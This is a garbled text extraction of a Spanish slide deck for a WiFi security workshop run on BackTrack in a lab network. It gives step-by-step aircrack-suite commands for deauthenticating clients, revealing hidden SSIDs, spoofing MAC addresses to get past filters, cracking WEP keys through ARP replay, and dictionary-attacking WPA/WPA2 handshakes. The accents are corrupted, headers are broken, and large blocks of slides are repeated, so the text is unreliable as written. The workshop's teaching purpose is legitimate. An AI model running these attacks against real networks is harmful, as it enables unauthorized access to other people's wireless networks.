bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 4: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494

Agenda

bull Conceptos de Seguridadbull Conociendo BackTrack

bull Armando el Laboratorio

bull Seguridad WLAN

bull Saltaacutendose la autenticacioacuten WLAN

bull

Fallas de encripcioacuten WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594

I- Conceptos de Seguridad

bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)

bull Se pretende tener ndash Confidencialidad

ndash Integridad

ndash Disponibilidad

bull Datos en proceso almacenados o en traacutensito

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694

Riesgo

bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida

bull El riesgo no se elimina

ndash

Aceptar el Riesgo ndash Minimizar el Riesgo

ndash Transferir el Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

